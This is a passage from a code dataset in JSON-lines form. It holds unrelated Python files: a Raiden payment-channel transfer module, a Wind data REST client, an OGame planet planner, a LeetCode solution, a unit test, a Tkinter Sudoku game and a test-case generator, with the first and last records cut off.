False)\n\n # `target` received the MediatedTransfer\n elif response.sender == target and isinstance(response, SecretRequest):\n secret_message = Secret(secret)\n raiden.sign(secret_message)\n raiden.send_async(target, secret_message)\n\n # register the secret now and just incur with the additional\n # overhead of retrying until the `next_hop` receives the secret\n # forward_channel.register_secret(secret)\n\n # wait until `next_hop` received the secret to syncronize our\n # state (otherwise we can send a new transfer with an invalid\n # locksroot while the secret is in transit that will incur into\n # additional retry/timeout latency)\n next_hop = path[1]\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n if isinstance(response, Secret) and response.sender == next_hop:\n # critical read/write section\n # The channel and it's queue must be locked, a transfer\n # must not be created while we update the balance_proof.\n forward_channel.claim_lock(secret)\n raiden.send_async(next_hop, secret_message)\n # /critical write section\n\n self.transfermanager.on_hashlock_result(hashlock, True)\n self.done_result.set(True)\n\n return\n\n log.error(\n 'Invalid message ignoring. %s',\n repr(response),\n )\n else:\n log.error(\n 'Unexpected response %s',\n repr(response),\n )\n self.transfermanager.on_hashlock_result(hashlock, False)\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER FAILED initiator:%s target:%s',\n pex(self.address),\n pex(self.target),\n )\n\n self.done_result.set(False) # all paths failed\n\n def send_and_wait_valid(self, raiden, path, mediated_transfer): # pylint: disable=no-self-use\n \"\"\" Send the `mediated_transfer` and wait for either a message from\n `target` or the `next_hop`.\n\n Validate the message received and discards the invalid ones. The most\n important case being next_hop sending a SecretRequest.\n \"\"\"\n message_timeout = raiden.config['msg_timeout']\n next_hop = path[1]\n target = path[-1]\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n # this event is used by the transfermanager to notify the task that a\n # response was received\n self.response_message = AsyncResult()\n\n raiden.send_async(next_hop, mediated_transfer)\n\n while current_time <= limit_time:\n # wait for a response message (not the Ack for the transfer)\n response = self.response_message.wait(limit_time - current_time)\n\n # reset so that a value can be received either because the current\n # result was invalid or because we will wait for the next message.\n #\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if response is None:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER TIMED OUT hashlock:%s',\n pex(mediated_transfer.lock.hashlock),\n )\n\n return None\n\n if response.sender == next_hop:\n if isinstance(response, (RefundTransfer, TransferTimeout)):\n return response\n else:\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'Partner %s sent an invalid message',\n pex(next_hop),\n )\n\n return None\n\n if response.sender == target:\n if isinstance(response, SecretRequest):\n return response\n else:\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'target %s sent an invalid message',\n pex(target),\n )\n\n return None\n\n current_time = time.time()\n\n if log.isEnabledFor(logging.ERROR):\n log.error(\n 'Invalid message ignoring. %s',\n repr(response),\n )\n\n return None\n\n\nclass MediateTransferTask(Task): # pylint: disable=too-many-instance-attributes\n def __init__(self, transfermanager, originating_transfer, fee):\n super(MediateTransferTask, self).__init__()\n\n self.address = transfermanager.assetmanager.raiden.address\n self.transfermanager = transfermanager\n self.fee = fee\n self.originating_transfer = originating_transfer\n\n hashlock = originating_transfer.lock.hashlock\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address)\n )\n\n def _run(self): # pylint: disable=method-hidden,too-many-locals,too-many-branches,too-many-statements\n fee = self.fee\n transfer = self.originating_transfer\n\n assetmanager = self.transfermanager.assetmanager\n raiden = assetmanager.raiden\n originating_channel = assetmanager.partneraddress_channel[transfer.sender]\n\n assetmanager.register_channel_for_hashlock(\n originating_channel,\n transfer.lock.hashlock,\n )\n\n lock_expiration = transfer.lock.expiration - raiden.config['reveal_timeout']\n lock_timeout = lock_expiration - raiden.chain.block_number()\n\n # there are no guarantees that the next_hop will follow the same route\n routes = assetmanager.get_best_routes(\n transfer.lock.amount,\n transfer.target,\n lock_timeout,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER initiator:%s node:%s target:%s',\n pex(transfer.initiator),\n pex(self.address),\n pex(transfer.target),\n )\n\n for path, forward_channel in routes:\n next_hop = path[1]\n\n mediated_transfer = forward_channel.create_mediatedtransfer(\n transfer.initiator,\n transfer.target,\n fee,\n transfer.lock.amount,\n lock_expiration,\n transfer.lock.hashlock,\n )\n raiden.sign(mediated_transfer)\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER NEW PATH path:%s hashlock:%s',\n lpex(path),\n pex(transfer.lock.hashlock),\n )\n\n # Using assetmanager to register the interest because it outlives\n # this task, the secret handling will happend only _once_\n assetmanager.register_channel_for_hashlock(\n forward_channel,\n transfer.lock.hashlock,\n )\n forward_channel.register_transfer(mediated_transfer)\n\n response = self.send_and_wait_valid(raiden, path, mediated_transfer)\n\n if response is None:\n timeout_message = forward_channel.create_timeouttransfer_for(transfer)\n raiden.send_async(transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n\n if isinstance(response, RefundTransfer):\n if response.lock.amount != transfer.amount:\n log.info(\n 'Partner %s sent an refund message with an invalid amount',\n pex(next_hop),\n )\n timeout_message = forward_channel.create_timeouttransfer_for(transfer)\n raiden.send_async(transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n else:\n forward_channel.register_transfer(response)\n\n elif isinstance(response, Secret):\n # update all channels and propagate the secret (this doesnt claim the lock yet)\n assetmanager.handle_secret(response.secret)\n\n # wait for the secret from `sender`\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n # NOTE: this relies on the fact RaindenService dispatches\n # messages based on the `hashlock` calculated from the\n # secret, so we know this `response` message secret matches\n # the secret from the `next_hop`\n if isinstance(response, Secret) and response.sender == transfer.sender:\n originating_channel.claim_lock(response.secret)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, True)\n return\n\n # No suitable path avaiable (e.g. insufficient distributable, no active node)\n # Send RefundTransfer to the originating node, this has the effect of\n # backtracking in the graph search of the raiden network.\n from_address = transfer.sender\n from_channel = assetmanager.partneraddress_channel[from_address]\n\n refund_transfer = from_channel.create_refundtransfer_for(transfer)\n from_channel.register_transfer(refund_transfer)\n\n raiden.sign(refund_transfer)\n raiden.send_async(from_address, refund_transfer)\n\n log.debug(\n 'REFUND MEDIATED TRANSFER from=%s node:%s hashlock:%s',\n pex(from_address),\n pex(raiden.address),\n pex(transfer.lock.hashlock),\n )\n\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n\n def send_and_wait_valid(self, raiden, path, mediated_transfer):\n message_timeout = raiden.config['msg_timeout']\n next_hop = path[1]\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n self.response_message = AsyncResult()\n raiden.send_async(next_hop, mediated_transfer)\n\n while current_time <= limit_time:\n response = self.response_message.wait(limit_time - current_time)\n\n # critical write section\n self.response_message = AsyncResult() # reset so that a new value can be received\n # /critical write section\n\n current_time = time.time()\n\n if response is None:\n log.error(\n 'MEDIATED TRANSFER TIMED OUT node:%s timeout:%s msghash:%s hashlock:%s',\n pex(raiden.address),\n message_timeout,\n pex(mediated_transfer.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n return None\n\n if isinstance(response, Secret):\n if sha3(response.secret) != mediated_transfer.lock.hashlock:\n log.error('Secret doesnt match the hashlock, ignoring.')\n continue\n\n return response\n\n if response.target != raiden.address or response.sender != next_hop:\n log.error('Invalid message supplied to the task. %s', repr(response))\n continue\n\n if isinstance(response, RefundTransfer):\n return response\n\n log.error('Partner sent an invalid message. %s', repr(response))\n\n return None\n\n\nclass EndMediatedTransferTask(Task):\n \"\"\" Task that request a secret for a registered transfer. \"\"\"\n\n def __init__(self, transfermanager, originating_transfer):\n super(EndMediatedTransferTask, self).__init__()\n\n self.address = transfermanager.assetmanager.raiden.address\n self.transfermanager = transfermanager\n self.originating_transfer = originating_transfer\n\n hashlock = originating_transfer.lock.hashlock\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address),\n )\n\n def _run(self): # pylint: disable=method-hidden\n mediated_transfer = self.originating_transfer\n assetmanager = self.transfermanager.assetmanager\n originating_channel = assetmanager.get_channel_by_partner_address(mediated_transfer.sender)\n raiden = assetmanager.raiden\n\n log.debug(\n 'END MEDIATED TRANSFER %s -> %s msghash:%s hashlock:%s',\n pex(mediated_transfer.target),\n pex(mediated_transfer.initiator),\n pex(mediated_transfer.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n\n secret_request = SecretRequest(mediated_transfer.lock.hashlock)\n raiden.sign(secret_request)\n\n response = self.send_and_wait_valid(raiden, mediated_transfer, secret_request)\n\n if response is None:\n timeout_message = originating_channel.create_timeouttransfer_for(mediated_transfer)\n raiden.send_async(mediated_transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(mediated_transfer.lock.hashlock, False)\n return\n\n # register the secret so that a balance proof can be created but don't\n # claim until our partner has informed us that it's internal state is\n # updated\n originating_channel.register_secret(response.secret)\n\n secret_message = Secret(response.secret)\n raiden.sign(secret_message)\n raiden.send_async(mediated_transfer.sender, secret_message)\n\n # wait for the secret from `sender` to claim the lock\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if isinstance(response, Secret) and response.sender == mediated_transfer.sender:\n originating_channel.claim_lock(response.secret)\n self.transfermanager.on_hashlock_result(mediated_transfer.lock.hashlock, True)\n return\n\n def send_and_wait_valid(self, raiden, mediated_transfer, secret_request):\n message_timeout = raiden.config['msg_timeout']\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n self.response_message = AsyncResult()\n raiden.send_async(mediated_transfer.initiator, secret_request)\n\n while current_time <= limit_time:\n response = self.response_message.wait(limit_time - current_time)\n\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if response is None:\n log.error(\n 'SECRETREQUEST TIMED OUT node:%s msghash:%s hashlock:%s',\n pex(raiden.address),\n pex(secret_request.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n return None\n\n if isinstance(response, Secret):\n if sha3(response.secret) != mediated_transfer.lock.hashlock:\n log.error('Secret doesnt match the hashlock, ignoring.')\n continue\n\n return response\n\n return None\n","sub_path":"raiden/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":25626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"215176814","text":"import pandas as pd\nimport requests\nimport json\nfrom datetime import datetime, date\nSTR_FORMAT_DATE = '%Y-%m-%d'\nSTR_FORMAT_DATETIME_WIND = '%Y-%m-%d %H:%M:%S' # 2017-03-06 00:00:00.005000\nUN_AVAILABLE_DATETIME = datetime.strptime('1900-01-01', STR_FORMAT_DATE)\nUN_AVAILABLE_DATE = UN_AVAILABLE_DATETIME.date()\ndef format_datetime_to_str(dt):\n if dt is None:\n return None\n dt_type = type(dt)\n if dt_type == str:\n return dt\n elif dt_type == date:\n if dt > UN_AVAILABLE_DATE:\n return dt.strftime(STR_FORMAT_DATE)\n else:\n return None\n elif dt_type == datetime:\n if dt > UN_AVAILABLE_DATETIME:\n return dt.strftime(STR_FORMAT_DATE)\n else:\n return None\n else:\n return dt\nclass APIError(Exception):\n def __init__(self, status):\n self.status = status\n def __str__(self):\n return \"APIError:status={}\".format(self.status)\nclass WindRest:\n def __init__(self, url_str):\n self.url = url_str\n self.header = {'Content-Type': 'application/json'}\n def _url(self, path: str) -> str:\n return self.url + path\n def public_post(self, path: str, req_data: str) -> list:\n # print('self._url(path):', self._url(path))\n ret_data = requests.post(self._url(path), data=req_data, headers=self.header)\n ret_dic = ret_data.json()\n if ret_data.status_code != 200:\n raise APIError('POST / {} {}'.format(ret_data.status_code, str(ret_dic)))\n else:\n return ret_data.status_code, ret_dic\n def wset(self, table_name, options):\n path = 'wset/'\n req_data_dic = {\"table_name\": table_name, \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def wss(self, codes, fields, options=\"\"):\n path = 'wss/'\n req_data_dic = {\"codes\": codes, \"fields\": fields, \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def wsd(self, codes, fields, begin_time, end_time, options=\"\"):\n path = 'wsd/'\n req_data_dic = {\"codes\": codes, \"fields\": fields,\n \"begin_time\": format_datetime_to_str(begin_time),\n \"end_time\": format_datetime_to_str(end_time),\n \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def tdaysoffset(self, offset, begin_time, options=\"\"):\n path = 'tdaysoffset/'\n req_data_dic = {\"offset\": offset,\n \"begin_time\": format_datetime_to_str(begin_time),\n \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n date_str = json_dic['Date']\n return date_str\nif __name__ == \"__main__\":\n url_str = \"http://10.0.5.110:5000/wind/\"\n # url_str = \"http://10.0.3.66:5000/wind/\"\n rest = WindRest(url_str)\n # data_df = rest.wset(table_name=\"sectorconstituent\", options=\"date=2017-03-21;sectorid=1000023121000000\")\n data_df = rest.wss(codes=\"QHZG160525.OF\", fields=\"fund_setupdate,fund_maturitydate,fund_mgrcomp,fund_existingyear,fund_ptmyear,fund_type,fund_fundmanager\")\n # data_df = rest.wsd(\"600123.SH\", \"close,pct_chg\", \"2017-01-04\", \"2017-02-28\", \"PriceAdj=F\")\n print(data_df)\n # date_str = rest.tdaysoffset(1, '2017-3-31')\n # print(date_str)","sub_path":"Stage/fh_tools/windy_utils_rest.py","file_name":"windy_utils_rest.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287696546","text":"import logging\nfrom pyogame.tools import Resources\nfrom pyogame.fleet import Fleet\nfrom pyogame.constructions import Constructions\nfrom pyogame.tools.common import coords_to_key\nfrom pyogame.abstract.planner import PlannerMixin\n\nlogger = logging.getLogger(__name__)\nDEUT_TO_MET_OFFSET = 7\nCRYS_TO_MET_OFFSET = 3\nROB_TO_SOL_RATIO = 2.4\nMET_TANK_RATIO = 7\nCRYS_TANK_RATIO = 9\n\n\nclass Planet(PlannerMixin):\n\n def __init__(self, name, coords, position, **kwargs):\n self.name = name\n self.coords = coords\n self.position = position\n self.idle = kwargs.get('idle', False)\n self.capital = kwargs.get('capital', False)\n self.waiting_for = kwargs.get('waiting_for', {})\n\n self.fleet = kwargs.get('fleet', Fleet())\n self.resources = kwargs.get('resources', Resources())\n self.constructs = kwargs.get('constructs', Constructions())\n self.plans = kwargs.get('plans', Constructions())\n PlannerMixin.__init__(self, 'constructs', 'plans')\n\n for ships in [ships for ships in self.fleet if not ships.quantity]:\n self.fleet.remove(ships)\n\n def get_curr(self, obj, bump_level=False):\n curr = self.constructs.cond(\n name=obj if isinstance(obj, str) else obj.name).first\n return curr.copy(curr.level) if bump_level else curr\n\n @property\n def key(self):\n return coords_to_key(self.coords)\n\n @property\n def is_fleet_empty(self):\n return not bool(self.fleet)\n\n @property\n def is_idle(self):\n return self.idle and not self.waiting_for\n\n @property\n def is_waiting(self):\n return bool(self.waiting_for)\n\n @property\n def is_metal_tank_full(self):\n return self.resources.metal >= self.get_curr('metal_tank').capacity\n\n @property\n def is_crystal_tank_full(self):\n return self.resources.crystal >= self.get_curr('crystal_tank').capacity\n\n @property\n def is_deuterium_tank_full(self):\n current_deut_cap = self.get_curr('deuterium_tank').capacity\n return self.resources.deuterium >= current_deut_cap\n\n def time_to_construct(self, cost):\n return ((float(cost.metal) + cost.crystal)\n / (2500. * (float(self.get_curr('robot_factory').level) + 1.)\n * pow(2., float(self.get_curr('nanite_factory').level))))\n\n def requirements_for(self, building):\n building_types = tuple(self.constructs.registry.values())\n unmatched_req = False\n for req in building.requirements or []:\n if (isinstance(req, building_types)\n and req.level > self.get_curr(req).level):\n unmatched_req = True\n yield from self.requirements_for(req)\n if unmatched_req:\n return\n if building.level > self.get_curr(building).level + 1:\n yield from self.requirements_for(\n building.__class__(building.level - 1))\n return\n yield building\n\n @property\n def to_construct(self):\n # Handling construction list\n metal_mine = self.get_curr('metal_mine')\n metal_tank = self.get_curr('metal_tank')\n crystal_tank = self.get_curr('crystal_tank')\n deut_tank = self.get_curr('deuterium_tank')\n solar_plant = self.get_curr('solar_plant')\n\n trigger_crys_lvl = metal_mine.level - CRYS_TO_MET_OFFSET\n trigger_deut_lvl = metal_mine.level - DEUT_TO_MET_OFFSET\n trigger_rob_lvl = int(solar_plant.level / ROB_TO_SOL_RATIO)\n\n cnstr = metal_mine\n if self.get_curr('crystal_mine').level < trigger_crys_lvl:\n cnstr = self.get_curr('crystal_mine')\n elif self.get_curr('deuterium_synthetizer').level < trigger_deut_lvl:\n cnstr = self.get_curr('deuterium_synthetizer')\n # more or less 5%\n if cnstr.cost.energy * .95 > self.resources.energy:\n cnstr = solar_plant\n if self.get_curr('robot_factory').level < trigger_rob_lvl:\n cnstr = self.get_curr('robot_factory')\n if cnstr.level >= 10:\n cnstr = self.get_curr('nanite_factory')\n if self.capital:\n if metal_tank.capacity < cnstr.cost.metal \\\n or self.is_metal_tank_full:\n cnstr = metal_tank\n elif crystal_tank.capacity < cnstr.cost.crystal \\\n or self.is_crystal_tank_full:\n cnstr = crystal_tank\n elif deut_tank.capacity < cnstr.cost.deuterium \\\n or self.is_deuterium_tank_full:\n cnstr = deut_tank\n else:\n def should_build_tank(res_type, ratio):\n mine = self.get_curr('%s_mine' % res_type)\n tank = self.get_curr('%s_tank' % res_type)\n return float(mine.level) / (1 + tank.level) > ratio\n if should_build_tank('metal', MET_TANK_RATIO):\n cnstr = self.get_curr('metal_tank')\n elif should_build_tank('crystal', CRYS_TANK_RATIO):\n cnstr = self.get_curr('crystal_tank')\n yield from self.requirements_for(cnstr.copy(level=cnstr.level + 1))\n\n @classmethod\n def load(cls, **kwargs):\n for key, attr_cls in (('fleet', Fleet),\n ('resources', Resources),\n ('constructs', Constructions),\n ('plans', Constructions)):\n kwargs[key] = attr_cls.load(**kwargs.get(key, {'data': {}}))\n return cls(**kwargs)\n\n def dump(self):\n return {'name': self.name,\n 'coords': self.coords,\n 'idle': self.idle,\n 'position': self.position,\n 'waiting_for': self.waiting_for,\n 'capital': self.capital,\n 'resources': self.resources.dump(),\n 'fleet': {'data': self.fleet.dump()},\n 'constructs': {'data': self.constructs.dump()},\n 'plans': {'data': self.plans.dump()}}\n\n def __repr__(self):\n return r\"\" % (\n self.name, self.coords, self.position)\n\n def __str__(self):\n return '%s %r' % (self.name, coords_to_key(self.coords))\n\n def __eq__(self, other):\n if isinstance(other, Planet) and other.coords == self.coords:\n return True\n return False\n","sub_path":"pyogame/planet.py","file_name":"planet.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"361929559","text":"# method 2, better than method 1\n# https://leetcode.com/problems/reconstruct-original-digits-from-english\n# /discuss/91207/one-pass-O(n)-JAVA-Solution-Simple-and-Clear\n\n\n\n\n# method 1, each digit has a unique letter\n\n\n\"\"\"\n'z', '0', 'zero'\n'w' '2' 'two'\n'x', '6', 'six'\n'u', '4', 'four'\n'g', '8', 'eight'\n\n't', '3', 'three'\n'f', '5', 'five'\n's', '7', 'seven'\n'o', '1', 'one'\n\n'e', '9', 'nine'\n\n\"\"\"\n\n\nclass Solution(object):\n def originalDigits(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n seq = [('z', '0', 'zero'), ('w', '2', 'two'), ('x', '6', 'six'),\n ('u', '4', 'four'), ('g', '8', 'eight'), ('t', '3', 'three'),\n ('f', '5', 'five'), ('s', '7', 'seven'), ('o', '1', 'one'),\n ('e', '9', 'nine')]\n digit_counts = {str(i): 0 for i in range(10)}\n s_counter = collections.Counter(s)\n for c, digit, english in seq:\n if s_counter.get(c, 0) > 0:\n cnt = s_counter[c]\n digit_counts[digit] = cnt\n for c_del in english: # remove all letters that are used\n s_counter[c_del] -= cnt\n res = []\n for digit in range(10):\n digit = str(digit)\n res.append(digit * digit_counts[digit])\n return \"\".join(res)\n\n\n\"\"\"\nGiven a non-empty string containing an out-of-order English representation of digits 0-9, \noutput the digits in ascending order.\n\nNote:\nInput contains only lowercase English letters.\nInput is guaranteed to be valid and can be transformed to its original digits. \nThat means invalid inputs such as \"abc\" or \"zerone\" are not permitted.\nInput length is less than 50,000.\nExample 1:\nInput: \"owoztneoer\"\n\nOutput: \"012\"\nExample 2:\nInput: \"fviefuro\"\n\nOutput: \"45\"\n\"\"\"","sub_path":"0423. Reconstruct Original Digits from English.py","file_name":"0423. Reconstruct Original Digits from English.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287215665","text":"#!/usr/bin/python3\n\nimport unittest\n\nfrom skills.skill import SkillInput\nfrom skills.change_assistant_voice_skill import ChangeAssistantVoiceSkill\nfrom nlp.universal_dependencies import ParsedUniversalDependencies\n\nclass TestChangeAssistantVoiceSkill(unittest.TestCase):\n \"\"\"Unit tests for `ChangeAssistantVoiceSkill`.\"\"\"\n def setUp(self):\n self.skill = ChangeAssistantVoiceSkill()\n \n def test_skillShouldRecognizeCommand(self):\n verbs = [\"use\"]\n\n for verb in verbs:\n ud = ParsedUniversalDependencies(verb=verb)\n skill_input = SkillInput(ud, False)\n self.assertTrue(\n self.skill.matches_command(skill_input),\n f\"ChangeAssistantVoiceSkill did not recognize verb='{verb}'\")","sub_path":"LTUAssistantPlus/test/skills/test_change_assistant_voice_skill.py","file_name":"test_change_assistant_voice_skill.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"8833366","text":"#!/usr/bin/env python\n# coding:utf-8\n\nimport tkinter as tk\nimport base64\nimport os\nimport random\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport sudoku_calc\nimport sudoku\nfrom icon import JPG_IMG, ICO_IMG\n\n\nclass Mygui:\n\n def __init__(self):\n # 记录当前已���成的题目个数\n self.count = 0\n self.coord = []\n self.value = [[0 for i in range(11)] for j in range(11)]\n self.ety = [[0 for i in range(11)] for j in range(11)]\n self.tmp = sudoku_calc.SD(switch=False)\n self.tmp.pmt()\n\n def bind(self):\n value_ls = self.tmp.create_puzzle(self.count)\n infl1 = [0, 1, 2, 4, 5, 6, 8, 9, 10]\n infl2 = [(0, 0), (0, 3), (0, 6), (3, 0), (3, 3), (3, 6), (6, 0), (6, 3), (6, 6)]\n rmlist1 = []\n rmlist2 = []\n for i in range(9):\n for j in range(9):\n self.value[infl1[i]][infl1[j]].set(value_ls[i][j])\n self.ety[infl1[i]][infl1[j]]['state'] = 'readonly'\n self.ety[infl1[i]][infl1[j]]['fg'] = 'red'\n rmlist2.append((i, j))\n\n # 保证每个区至少有两个挖空\n tmp_ls = list(range(9))\n coord_a = tmp_ls.pop(random.randint(0, 8))\n coord_b = tmp_ls.pop(random.randint(0, 7))\n rmlist1.append(tuple(map(lambda x, y: x+y, (int(coord_a/3), coord_a%3), infl2[i])))\n rmlist1.append(tuple(map(lambda x, y: x+y, (int(coord_b/3), coord_b%3), infl2[i])))\n\n # 随机生成18+num个空\n num = random.randint(12, 42)\n rmleft = set(rmlist2)\n rmleft.difference_update(set(rmlist1))\n\n # rmleft为除去那18个空外还剩余的位置\n left = list(rmleft)\n for i in range(num):\n\n # 再随机选择num个空添加到rmlist1,此时rmlist1有30-60对坐标\n rmlist1.append(left.pop(random.randint(0, len(left)-1)))\n for i in rmlist1:\n\n # 将rmlist1中坐标的点的值都置空\n self.value[infl1[i[0]]][infl1[i[1]]].set('')\n self.ety[infl1[i[0]]][infl1[i[1]]]['state'] = 'normal'\n self.ety[infl1[i[0]]][infl1[i[1]]]['fg'] = 'black'\n self.ety[infl1[i[0]]][infl1[i[1]]]['bg'] = '#F0F0F0'\n\n # 题目计数+1\n self.count += 1\n\n def check(self):\n hash_ls = [0, 1, 2, 4, 5, 6, 8, 9, 10]\n grid = [[0 for i in range(9)] for j in range(9)]\n\n # 输入不合法时报错\n for i in range(9):\n for j in range(9):\n grid[i][j] = self.value[hash_ls[i]][hash_ls[j]].get()\n if grid[i][j] not in list(map(str, list(range(1, 10)))):\n messagebox.showerror('Result', 'Wrong Answer!')\n return\n grid[i][j] = {int(grid[i][j])}\n\n row = []\n col = []\n part = []\n for i in range(9):\n row.append(sudoku.row_left(grid[i]))\n col.append(sudoku.row_left([rowig[i] for rowig in grid]))\n part.append(sudoku.row_left(sudoku.comb(grid, 3*(int(i/3)), 3*(i % 3))))\n if sudoku.isnone(row) and sudoku.isnone(col) and sudoku.isnone(part):\n messagebox.showinfo('Result', 'Perfect!')\n else:\n messagebox.showerror('Result', 'Wrong Answer!')\n\n\n def gui(self):\n root = tk.Tk()\n # 设置窗口宽度与高度不可变\n root.resizable(False, False)\n root.title(\"Sudoku\")\n\n # 从文件中读取并解码生成临时图标,用完后立马删除\n tmp = open(\"tmp.ico\", \"wb+\")\n tmp.write(base64.b64decode(ICO_IMG))\n tmp.close()\n #im = Image.open(\"tmp.ico\")\n #img = ImageTk.PhotoImage(im)\n #root.tk.call('wm', 'iconphoto', root._w, img)\n root.iconbitmap('tmp.ico')\n os.remove(\"tmp.ico\")\n tmp = open(\"tmp.jpg\", \"wb+\")\n tmp.write(base64.b64decode(JPG_IMG))\n tmp.close()\n tmp_image = Image.open(\"tmp.jpg\")\n photo = ImageTk.PhotoImage(tmp_image)\n label = tk.Label(root, image=photo)\n os.remove(\"tmp.jpg\")\n # for i in range(11):\n # root.rowconfigure(i,weight=1)\n # root.columnconfigure(i,weight=1)\n # root.rowconfigure(11,weight=1)\n\n # 生成空格\n for i in range(11):\n for j in range(11):\n if i != 3 and i != 7 and j != 3 and j != 7:\n self.value[i][j] = tk.StringVar()\n self.ety[i][j] = tk.Entry(root, textvariable=self.value[i][j], width=2, font=90)\n self.ety[i][j].grid(row=i, column=j, padx=12, pady=12, sticky='NSEW')\n\n # 生成第一个题目并显示\n self.bind()\n\n label.grid(row=0, column=0, rowspan=12, columnspan=11, sticky='NSEW')\n\n # 确定按钮\n submit_btn = tk.Button(root, text='OK', command=lambda:self.check())\n submit_btn.grid(row=11, column=9, pady=10, ipadx=30, columnspan=2)\n\n # next按钮\n next_btn = tk.Button(root, text='Next>', command=lambda:self.bind())\n next_btn.grid(row=11, column=0, pady=10, ipadx=20, columnspan=2)\n\n root.mainloop()\n\n\ndef main():\n sudokugui = Mygui()\n sudokugui.gui()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Sudoku Gui/sudokugui.py","file_name":"sudokugui.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211218373","text":"#! /usr/bin/python\n\nimport random\nimport math\n\nfor i in range(1,101):\n # Casos al azar\n n = random.randint(1,1000)\n m = random.randint(1,1000)\n s = random.randint(1,200)\n ih = random.randint(1,n)\n iv = random.randint(1,m)\n bh = random.randint(1,n)\n bv = random.randint(1,m)\n fout = open(\"./testsTiempos/random/{:03d}.in\".format(i), 'w')\n fout.write(\"{} {} {}\\n\".format(n,m,s))\n fout.write(\"{} {} {} {}\\n\".format(ih,iv,bh,bv))\n for x in range(0, n-1):\n for bla in range(0,m-1):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n fout.write(\"\\n\")\n for bla in range(0,m):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n for bla in range(0,m-1):\n z = random.randint(0,2*s)\n fout.write('{} '.format(z))\n fout.close()\n tambytes = 32 * n * m\n print(\"Test {:03d} ocupa {:06}MBs\".format(i,((tambytes/1024)/1024)))\n\nfor i in range(1,101):\n # Peor caso: grilla cuadrada con menos zombis que soldados en todas las calles\n # y hay que recorrer de una esquina a la otra\n n = int(math.sqrt(i*250000))\n s = 100\n ih = 1\n iv = 1\n bh = n\n bv = n\n fout = open(\"./testsTiempos/peorcaso/{:03d}.in\".format(i), 'w')\n fout.write(\"{} {} {}\\n\".format(n,n,s))\n fout.write(\"{} {} {} {}\\n\".format(ih,iv,bh,bv))\n for x in range(0, n-1):\n for bla in range(0,n-1):\n z = 10\n fout.write('{} '.format(z))\n fout.write(\"\\n\")\n for bla in range(0,n):\n z = 10\n fout.write('{} '.format(z))\n for bla in range(0,n-1):\n z = 10\n fout.write('{} '.format(z))\n fout.close()\n tambytes = 32 * n * n\n print(\"Test {:03d} ocupa {:06}MBs\".format(i,((tambytes/1024)/1024)))\n","sub_path":"tp2/src/zombieland2/gentest.py","file_name":"gentest.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"364372831","text":"from os import path\nfrom pathlib import Path\nfrom re import X\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport pandas as pd\nimport os\n\ncros = []\nretro = []\n\ndef generateAgreg(File:path):\n df = pd.read_csv(File)\n out = 0.0\n cnt = 0\n for index,rows in df.iterrows():\n out = out + float(rows['W'])\n cnt = cnt+1\n return out/cnt\n\n\ndef visu(retro,cros):\n fig = go.Figure()\n x_val = [\"Kicsit\", \"Közepes 